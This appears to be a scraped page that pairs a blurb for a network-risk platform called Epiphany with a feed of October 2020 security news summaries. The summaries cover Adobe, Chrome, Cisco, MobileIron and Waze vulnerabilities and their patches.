Risk is a condition that pre-exists an incident. If you reduce security risk, you will reduce security incidents. Epiphany is a new risk detection and quantification platform that highlights, qualifies and quantifies the risks that occur within the technical structure and users of a network, giving the security team the opportunity to eliminate the risk before an incident.
tech-wreck infosec blogRetrieved title: Tech-Wreck InfoSec Blog, 3 item(s)
Adobe Releases Second Set of Security Updates for October (10/20/2020)
In a second round of security advisories for October, Adobe has issued bulletins for a number of products including Illustrator, Dreamweaver, Photoshop, InDesign, and its Creative Cloud Desktop Application. A total of twenty vulnerabilities have been addressed, including seven critical bugs that can lead to arbitrary code execution in the Windows and macOS versions of Illustrator. While many of the vulnerabilities have been rated critical, a majority have a priority rating of 3, which indicates that Adobe does not expect them to be exploited in malicious attacks.
Chrome Update Fixes Zero-Day in Freetype Font Library (10/20/2020)
Google's newest release of its Chrome browser includes five security updates, including a patch for a zero-day vulnerability in its Freetype font rendering library. Details of the bug have not been released, although the company says it is a heap buffer overflow issue and it is aware of reports that an exploit exists in the wild. Google often restricts access to bug details until a majority of users are updated with a fix or if the bug is known to exist in third party libraries but has not yet been remediated.
Cisco Issues 17 Security Appliance Patches (10/21/2020)
The October release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication includes advisories that describe 17 vulnerabilities in Cisco Adaptive Security Appliance (ASA), Firepower Threat Defense (FTD), and Firepower Management Center (FMC) software. Cisco has released software updates for these vulnerabilities. All of the vulnerabilities have a security impact rating (SIR) of high.
Company Networks, Mobile Devices at Risk Due to MDM Server Bugs (10/21/2020)
Recently disclosed vulnerabilities in MobileIron servers used to manage enterprise mobile devices are being exploited to attack company networks. Although the flaws were patched by MobileIron in July, a published report detailing one of the bugs led to the development of proof of concept exploits that are now being used in the wild. Since these mobile device management (MDM) servers must be online 24/7 in order to communicate updates with company devices, they are often targeted for attacks. In this case, the flaw allows an unauthenticated remote user to execute arbitrary code and install DDoS malware. As ZDNet points out, "Patching is only half of the job. Companies must also perform security audits of their MobileIron MDM servers, their mobile devices, and internal networks," continuing that "intruders can use this bug to take over the entire MDM server and then deploy malware on mobile devices connected to the MDM server or access the company's internal network, to which the MDM server is likely to be connected."
Malicious NPM Software Packages Identified (10/19/2020)
Waze GPS App Showed Usernames, Allowed Tracking of Individuals (10/19/2020)
A vulnerability has been discovered in the Waze GPS navigation app that can allow hackers to identify drivers by username and ID and track them. Because the app shows icons of other drivers in the vicinity, a researcher discovered that he could get the Waze API to display the coordinates for both his location and for nearby users. While inspecting the data, he noticed that ID numbers associated with the icons were not only included but didn't change over time. The unique IDs then allowed him to track individual users and follow them on the map. What's more, according to Autoevolution, the researcher said, "I found out that if user acknowledge any road obstacle or reported police patrol, user ID together with the username is returned by the Waze API to any Wazer driving through the place. The application usually don't show this data unless there is an explicit comment created by the user, but the API response contains the username, ID, location of an event and even a time when it was acknowledged." The researcher received a bounty for the discovery and the vulnerability has been patched.
xkcdRetrieved title: xkcd.com, 3 item(s)